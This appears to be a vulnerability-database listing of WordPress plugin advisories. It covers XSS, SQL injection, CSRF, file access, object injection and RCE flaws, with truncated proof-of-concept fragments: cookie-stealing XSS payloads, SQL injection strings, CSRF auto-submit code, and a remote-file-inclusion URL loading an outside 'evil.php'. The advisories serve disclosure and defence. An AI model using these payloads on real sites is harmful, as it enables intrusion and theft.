Wpexploit • Most viewed

4359 matches found

wpexploit • added 2022/03/09 12:0 a.m. • 78 views

WP HTML Mail < 3.1.3 - Reflected Cross-Site Scripting

The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting https://example.com/wp-admin/options-general.php?page=wp-html-mail&tab=advanced&a"alert/XSS/...

AI score: 7.1
Exploits: 0

wpexploit • added 2022/02/22 12:0 a.m. • 78 views

RW Divi Unite Gallery <= 1.0 - Security Bypass via Outdated Freemius

The plugin is vulnerable to a security bypass due to the use of a known vulnerable component, Freemius 2.2.4. The plugin uses Freemius 1.0.0 and is therefore vulnerable. The core issue that causes the vulnerability is in the setdboption function, which is exposed to any authenticated user with no...

AI score: 0.7
Exploits: 0 • References: 1

wpexploit • added 2022/02/15 12:0 a.m. • 78 views

Relevanssi - Subscriber+ Unauthorised AJAX Calls

The plugins do not have authorisation and CSRF checks in some of their AJAX actions, allowing any authenticated users, such as subscriber, to call them. This could disclose information to subscribers, as well as allow them to truncate the index, which will disable the search...

AI score: 2.5
Exploits: 0 • References: 2

wpexploit • added 2022/02/03 12:0 a.m. • 78 views

Ad Inserter < 2.7.11 - Admin+ RCE / Stored XSS

The plugin does not make any security checks regarding the PHP and JS code in blocks, allowing high privilege users such as admin to execute commands on the underlying OS as well as perform Stored Cross-Site Scripting attacks even in multisite blogs and hardened ones. 1. Go to Settings - Ad...

AI score: 0.7
Exploits: 0

wpexploit • added 2022/01/24 12:0 a.m. • 78 views

Catch Web Tools < 2.7.1 - Subscriber+ Arbitrary Catch IDs Activation/Deactivation

The plugin does not have authorisation and CSRF check in its catchwebtoolscatchidsswitch AJAX action, allowing any authenticated users, such as subscriber to activate/disable Catch IDs fetch"https://example.com/wp-admin/admin-ajax.php", "headers": "content-type":...

AI score: 0.9
Exploits: 0 • References: 1

wpexploit • added 2021/12/27 12:0 a.m. • 78 views

WP Extra File Types < 0.5.1 - CSRF to Stored Cross-Site Scripting

The plugin does not have CSRF check when saving its settings, nor sanitise and escape some of them, which could allow attackers to make a logged in admin change them and perform Cross-Site Scripting attacks var form1 = document.getElementById'hack'; form1.submit;...

CVSS: 8 • AI score: 0.2 • EPSS: 0.00541
Exploits: 2

wpexploit • added 2021/11/29 12:0 a.m. • 78 views

Rich Reviews by Starfish < 1.9.6 - Admin+ SQL Injection

The plugin does not properly validate the orderby GET parameter of the pending reviews page before using it in a SQL statement, leading to an authenticated SQL injection issue error-based SQLI: orderby=id AND EXTRACTVALUE4795,CONCAT0x5c,0x717a627871,SELECT ELT4795=4795,1,0x7176707071 time-based...

CVSS: 7.2 • AI score: 1.6 • EPSS: 0.01497
Exploits: 2 • References: 1

wpexploit • added 2023/03/16 12:0 a.m. • 77 views

WP Tiles <= 1.1.2 - Contributor+ Stored XSS

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. wp-tiles extraclasses='"...

CVSS: 5.4 • AI score: 5.2 • EPSS: 0.00471
Exploits: 2

wpexploit • added 2023/01/17 12:0 a.m. • 77 views

uTubeVideo Gallery < 2.0.8 - Contributor+ Stored XSS

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. utubevideo view='panel' id='"...

CVSS: 5.4 • AI score: 1.4 • EPSS: 0.00477
Exploits: 2

wpexploit • added 2023/01/05 12:0 a.m. • 77 views

Widgets for Google Reviews < 9.8 - Contributor+ Stored XSS

The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins. Exploit...

CVSS: 6.4 • AI score: 1.6 • EPSS: 0.00507
Exploits: 2

wpexploit • added 2022/01/31 12:0 a.m. • 77 views

Superforms < 6.0.4 - Reflected Cross-Site Scripting

The plugin does not escape the bobczypanstwasprawazostalarozwiazana parameter before outputting it back in an attribute via the superlanguageswitcher AJAX action, leading to a Reflected Cross-Site Scripting. The action is also lacking CSRF, making the attack easier to perform against any user...

AI score: 0.8 • EPSS: 0.00313
Exploits: 2 • References: 1

wpexploit • added 2020/12/12 12:0 a.m. • 77 views

Directories Pro < 1.3.46 - Authenticated Self-Reflected Cross-Site Scripting

The plugin did not sanitise the column names when importing a malicious CSV file, allowing for HTML or JavaScript injection. Import a CSV file containing the following in the header: 'term" autofocus onfocus=alert'Complex\u0020XSS';alertdocument.cookie;//'"...

CVSS: 4.3 • AI score: 6.5 • EPSS: 0.05483
Exploits: 3 • References: 1

wpexploit • added 2022/12/05 12:0 a.m. • 76 views

Welcart e-Commerce < 2.8.5 - Subscriber+ Arbitrary File Access

The plugin does not validate user input before using it to output the content of a file via an AJAX action available to any authenticated users, which could allow users with a role as low as subscriber to read arbitrary files on the server. Run the below command in the developer console of the we...

CVSS: 6.5 • EPSS: 0.00795
Exploits: 2

wpexploit • added 2022/03/29 12:0 a.m. • 76 views

English WordPress Admin < 1.5.2 - Unauthenticated Open Redirect

The plugin does not validate the admincustomlanguagereturnurl before redirecting users to it, leading to an open redirect issue https://example.com/wp-admin/admin-ajax.php?action=heartbeat&admincustomlanguagetoggle=1&admincustomlanguagereturnurl=https://wpscan.com...

CVSS: 6.1 • AI score: 2.4 • EPSS: 0.01873
Exploits: 2

wpexploit • added 2022/03/28 12:0 a.m. • 76 views

Thank Me Later <= 3.3.4 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape the Message Subject field before outputting it in the Messages list, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Add/Edit a message and put the following...

CVSS: 4.8 • AI score: 0.5 • EPSS: 0.00577
Exploits: 2

wpexploit • added 2022/01/17 12:0 a.m. • 76 views

WP-Appbox < 4.3.18 - Authenticated Local File Inclusion

The plugin does not validate user input before using it to create a local path that is then passed to an include_once statement, leading to a Local File Inclusion issue https://example.com/wp-admin/options-general.php?page=wp-appbox&tab=advanced%2F..%2F...

AI score: 1.2
Exploits: 0

wpexploit • added 2022/01/12 12:0 a.m. • 76 views

Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue < 3.1.31 - Reflected Cross-Site Scripting

The plugin does not escape the lang and pid parameter before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues https://example.com/wp-admin/admin.php?sibpageform&action=edit&id=1&pid=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22...

CVSS: 6.1 • AI score: 1.1 • EPSS: 0.00788
Exploits: 2

wpexploit • added 2021/05/07 12:0 a.m. • 76 views

Leads-5050 Visitor Insights < 1.1.0 - Unauthorised License Change

The leads5050setlicense AJAX action is available to authenticated users, but is missing any capability and CSRF checks. This could allow any low privilege users subscriber+ to set an arbitrary license in the plugins settings POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Accept: application/jso...

AI score: 1.5
Exploits: 0

wpexploit • added 2020/07/13 12:0 a.m. • 76 views

Workup – Job Board < 2.1.6 - Unauthenticated Reflected XSS

Unauthenticated Reflected XSS vulnerability was discovered in the «Workup – Job Board WordPress Theme», tested version — v2.1.5...

AI score: 1.8
Exploits: 0 • References: 2

wpexploit • added 2019/02/15 12:0 a.m. • 76 views

Advanced Custom Fields <= 5.7.10 - Unserialize of user input

Multiple maybe_unserialize calls result in unserialize of user input. Low privileged users such as contributors, but in many cases visitors too https://medium.com/websec/wordpress-acf-5-7-10-unserialize-of-user-input-ac17cc473e0d...

AI score: 3.4
Exploits: 0 • References: 1

wpexploit • added 2018/10/02 12:0 a.m. • 76 views

Wordfence <= 7.1.12 - Username Enumeration Prevention Bypass

The Wordfence Security – Firewall & Malware Scan WordPress plugin was affected by a Username Enumeration Prevention Bypass security vulnerability. Wordfence blocks: http://www.example.com/?author=1 But allowed: http://www.example.com/?author=1...

AI score: 0.9
Exploits: 0 • References: 2

wpexploit • added 2020/12/09 12:0 a.m. • 75 views

DiveBook <= 1.1.4 - Unauthenticated SQL Injection

The filterdiver GET parameter, in pages where the DiveBook is embedded, is not properly sanitised and validated, leading to an Unauthenticated SQL injection vulnerability. The PoC will be displayed once the issue has been remediated...

CVSS: 5 • AI score: 1 • EPSS: 0.01422
Exploits: 1 • References: 1

wpexploit • added 2023/01/30 12:0 a.m. • 74 views

GS Books Showcase < 1.3.1 - Contributor+ Stored XSS

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. gsbookshowcase theme='" onmouseover="alert1...

CVSS: 6.8 • AI score: 5.2 • EPSS: 0.00608
Exploits: 2

wpexploit • added 2022/04/04 12:0 a.m. • 74 views

Weblizar Pin It Button On Image Hover And Post < 3.4 - Subscriber+ Arbitrary Settings Update

The plugin does not have authorisation and proper CSRF check when saving its settings, allowing any authenticated users, such as subscribers to update them fetch"https://example.com/wp-admin/admin-ajax.php", "headers": "content-type": "application/x-www-form-urlencoded", , "body": new...

AI score: 0.6
Exploits: 0

wpexploit • added 2022/01/17 12:0 a.m. • 74 views

Magee Shortcodes < 2.0.9 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape various parameters before outputting them back in attributes in AJAX actions available to both unauthenticated and authenticated users, leading to Reflected Cross-Site Scripting issues...

AI score: 6.6
Exploits: 0

wpexploit • added 2022/01/05 12:0 a.m. • 74 views

SupportCandy < 2.2.7 - CSRF to Cross-Site Scripting

The plugin does not have CSRF check in the wpsctickets AJAX action, nor has any sanitisation or escaping in some of the filter fields which could allow attackers to make a logged in user having access to the ticket lists dashboard set an arbitrary filter stored in their cookies with an XSS payloa...

CVSS: 8.8 • AI score: 0.7 • EPSS: 0.00612
Exploits: 2

wpexploit • added 2021/12/14 12:0 a.m. • 74 views

True Ranker < 2.2.4 - Unauthenticated Arbitrary File Access via Path Traversal

The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the /admin/vendor/datatables/examples/resources/examples.php file. Exploit Authors: Nicole Sheinin, Liad Levy Tested on: MacOS !/usr/bin/env python3 impo...

CVSS: 7.5 • AI score: 0.8 • EPSS: 0.78431
Exploits: 5 • References: 2

wpexploit • added 2020/04/06 12:0 a.m. • 74 views

Vanguard <= 2.1 - Multiple Cross-Site Scripting (XSS)

The plugin does not sanitise, validate or escape some of its parameters before outputting them back in various places, leading to either Stored or Reflected Cross-Site Scripting issues. Put the following payload in the In Products Search box: " POST /search HTTP/1.1 Accept:...

CVSS: 4.3 • AI score: 0.5 • EPSS: 0.01167
Exploits: 2 • References: 1

wpexploit • added 2019/07/17 12:0 a.m. • 74 views

WP Code Highlight.js < 0.6.3 - CSRF to Stored XSS

Lack of CSRF checks could allow attackers to make a logged in admin create XSS payloads. document.getElementById'hljs'.submit;...

CVSS: 6.8 • AI score: 0.8 • EPSS: 0.01343
Exploits: 2 • References: 1

wpexploit • added 2023/02/08 12:0 a.m. • 73 views

Replyable < 2.2.10 - Subscriber+ PHP Object Injection

The plugin does not validate the class name submitted by the request when instantiating an object in the promptdismissnotice action and also lacks CSRF check in the related action. This could allow any authenticated users, such as subscriber to perform Object Injection attacks. The attack could...

CVSS: 8.8 • AI score: 8.7 • EPSS: 0.00511
Exploits: 2

wpexploit • added 2022/12/23 12:0 a.m. • 73 views

Show All Comments < 7.0.1 - Reflected XSS

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against logged in high privilege users such as admin. Visit the following URL authenticated or not to trigger an alert box:...

CVSS: 6.1 • AI score: 0.2 • EPSS: 0.00897
Exploits: 2

wpexploit • added 2021/11/10 12:0 a.m. • 73 views

Error Log Viewer Plugin <= 1.1.1 - Admin+ Arbitrary File Clearing

The plugin does not validate the path of the log file to clear, allowing high privilege users to clear arbitrary files on the web server, including those outside of the blog folder Click the "Log Monitor" available under Error Log Viewer menu item. Choose a log file to clear. Intercept the reques...

AI score: 0.9 • EPSS: 0.05188
Exploits: 5

wpexploit • added 2020/04/20 12:0 a.m. • 73 views

GTranslate < 2.8.52 - Unauthenticated Reflected Cross Site Scripting (XSS)

The GTranslate plugin before 2.8.52 for WordPress was vulnerable to an Unauthenticated Reflected XSS vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option. The vulnerability was due to outputting the WordPress add_query_arg...

CVSS: 4.3 • AI score: 0.1 • EPSS: 0.04457
Exploits: 1 • References: 1

wpexploit • added 2019/09/05 12:0 a.m. • 73 views

WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation

Description According to the WordPress release notes: "Props to Soroush Dalili @irsdl from NCC Group for disclosing an issue with URL sanitization that can lead to cross-site scripting XSS attacks." Thanks to @irsdl's Hacker1 disclosure: JS - Numerical Entities JS - Hex Entities...

CVSS: 6.1 • AI score: 6.3 • EPSS: 0.02198
Exploits: 2 • References: 3

wpexploit • added 2023/01/30 12:0 a.m. • 72 views

GS Portfolio for Envato < 1.4.0 - Contributor+ Stored XSS

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks Insert the following shortcode in a...

CVSS: 5.4 • AI score: 5.2 • EPSS: 0.00457
Exploits: 2

wpexploit • added 2022/01/31 12:0 a.m. • 72 views

Crazy Bone <= 0.6.0 - Unauthenticated Stored XSS

The plugin does not sanitise and escape the username submitted via the login form when displaying it back in the log dashboard, leading to an unauthenticated Stored Cross-Site Scripting. curl 'https://example.com/wp-login.php' --data-raw 'log=a&pwd=x&wp-submit=Log+In' The XSS will be triggered in...

AI score: 0.6 • EPSS: 0.01374
Exploits: 2

wpexploit • added 2022/01/06 12:0 a.m. • 72 views

IP2Location Country Blocker < 2.26.5 - Subscriber+ Arbitrary Country Ban

The plugin does not have authorisation and CSRF checks in the ip2locationcountryblockersaverules AJAX action, allowing any authenticated users, such as subscriber to call it and block arbitrary country, or block all of them at once, preventing users from accessing the frontend. v2.26.5 added...

CVSS: 7.1 • AI score: 0.6 • EPSS: 0.00537
Exploits: 2 • References: 1

wpexploit • added 2021/12/09 12:0 a.m. • 72 views

Accept Donations with PayPal < 1.3.4 - Arbitrary Post Deletion via CSRF

The plugin does not have CSRF check in place and does not ensure that the post to be deleted belongs to the plugin, allowing attackers to make a logged in admin delete arbitrary posts from the blog https://examle.com/wp-admin/admin.php?page=wpedonmenu&action=delete&action2=delete&order=1...

CVSS: 6.5 • AI score: 2.9 • EPSS: 0.00538
Exploits: 2

wpexploit • added 2021/11/29 12:0 a.m. • 72 views

Download Manager < 3.2.22 - Subscriber+ Stored Cross-Site Scripting

The plugin does not sanitise and escape Template data before outputting it in various pages such as the admin dashboard and frontend. Due to the lack of authorisation and CSRF checks in the wpdmsavetemplate AJAX action, any authenticated user, such as a subscriber, is able to call it and perform...

CVSS: 5.4 • AI score: 0.6 • EPSS: 0.006
Exploits: 2

wpexploit • added 2022/03/14 12:0 a.m. • 71 views

Members List < 4.3.7 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape some parameters in various pages before outputting them back, leading to Reflected Cross-Site Scripting issues https://example.com/wp-content/plugins/members-list/admin/view/user.php?page=%22%3E%3Cimg/src/onerror=alert/XSS/%20x...

AI score: 1.2
Exploits: 0 • References: 1

wpexploit • added 2021/10/21 12:0 a.m. • 71 views

Core Tweaks WP Setup <= 4.1 - Arbitrary Admin Account Creation / Admin Email Update via CSRF

The plugin allows bulk-setting many settings in WordPress, including the admin email, as well as creating a new admin account. There is no CSRF protection in place, allowing an attacker to arbitrarily change the admin email or create another admin account and take over the website via CSRF attacks...

AI score: 1.4 • EPSS: 0.00618
Exploits: 2

wpexploit • added 2023/02/02 12:0 a.m. • 69 views

Magazine Edge <= 1.13 - Subscriber+ Arbitrary Plugin Activation

The theme does not have authorisation and CSRF when activating plugins via an AJAX action, allowing any authenticated users, such as subscriber to activate arbitrary plugins Run the below command in the developer console of the web browser while being on the blog as a subscriber user...

AI score: 1
Exploits: 0

wpexploit • added 2023/01/30 12:0 a.m. • 69 views

GS Filterable Portfolio < 1.6.1 - Contributor+ Stored XSS

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. Note: First, you need to add a Portfolio...

CVSS: 5.4 • AI score: 5.2 • EPSS: 0.00457
Exploits: 2

wpexploit • added 2021/12/06 12:0 a.m. • 69 views

WPcalc <= 2.1 - Authenticated SQL Injection

The plugin does not sanitize user input into the 'did' parameter and uses it in a SQL statement, leading to an authenticated SQL Injection vulnerability. Plugin author closed the plugin. http://www.example.com/wp-admin/admin.php?page=wpcalc&info=del&did=1 AND SELECT 7156 FROM SELECTSLEEP5MIkl or,...

CVSS: 8.8 • AI score: 1.3 • EPSS: 0.01318
Exploits: 2

wpexploit • added 2021/11/29 12:0 a.m. • 69 views

Contact Form & Lead Form Elementor Builder < 1.6.4 - Unauthenticated Stored Cross-Site Scripting

The plugin does not sanitise and escape some lead values, which could allow unauthenticated users to perform Cross-Site Scripting attacks against logged in admin viewing the inserted Leads fetch"https://example.com/wp-admin/admin-ajax.php", "headers": "content-type":...

CVSS: 6.1 • AI score: 0.3 • EPSS: 0.01167
Exploits: 2

wpexploit • added 2020/05/11 12:0 a.m. • 68 views

Page Builder by SiteOrigin < 2.10.16 - CSRF to Reflected Cross-Site Scripting (XSS)

Flaws in the live editor and actionbuildercontent functions of the plugin "allow attackers to forge requests on behalf of a site administrator and execute malicious code in the administrator’s browser. The attacker needs to trick a site administrator into executing an action, like clicking a link...

CVSS: 6.8 • AI score: 0.4 • EPSS: 0.00809
Exploits: 3 • References: 1

wpexploit • added 2020/04/02 12:0 a.m. • 68 views

Art-Picture-Gallery <= 1.2.9 - Unauthenticated Arbitrary File Upload

Edit WPScanTeam: March 26th, 2020 - Report Received & Vendor Contacted March 30th, 2020 - Escalated to WP Plugins team as no response from vendor March 31st, 2020 - WP Plugins team investigating & Plugin closed April 2nd, 2020 - Disclosure The PoC will be displayed once the issue has been remedia...

CVSS: 7.5 • AI score: 0.6 • EPSS: 0.97107
Exploits: 15

wpexploit • added 2020/01/17 12:0 a.m. • 68 views

Marketo Forms and Tracking <= 1.0.2 - CSRF to XSS

Lack of CSRF checks and sanitisation on the plugin's settings page could allow XSS attacks via CSRF. document.getElementById'csrf'.submit;...

CVSS: 6.8 • AI score: 1 • EPSS: 0.0132
Exploits: 2 • References: 1

wpexploit • added 2022/02/15 12:0 a.m. • 67 views

The Events Calendar < 5.14.0 - Reflected Cross-Site Scripting

The plugin does not escape an aggregator URL before outputting it back in an attribute, leading to Reflected Cross-Site Scripting When there is an Event Aggregator license key active: https://example.com/wp-admin/edit.php?page=tribe-common&tab=imports&posttype=tribeevents&"alert/XSS/...

AI score: 7.1
Exploits: 0

wpexploit • added 2021/12/05 12:0 a.m. • 67 views

Button Generator < 2.3.3 - RFI leading to RCE via CSRF

The plugin, within the wow-company admin menu page, allows including an arbitrary file with a PHP extension as well as with the data:// or http:// protocols, thus leading to CSRF RCE. http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...

CVSS: 8.8 • AI score: 1.2 • EPSS: 0.0353
Exploits: 2 • References: 1

Total number of security vulnerabilities: 4359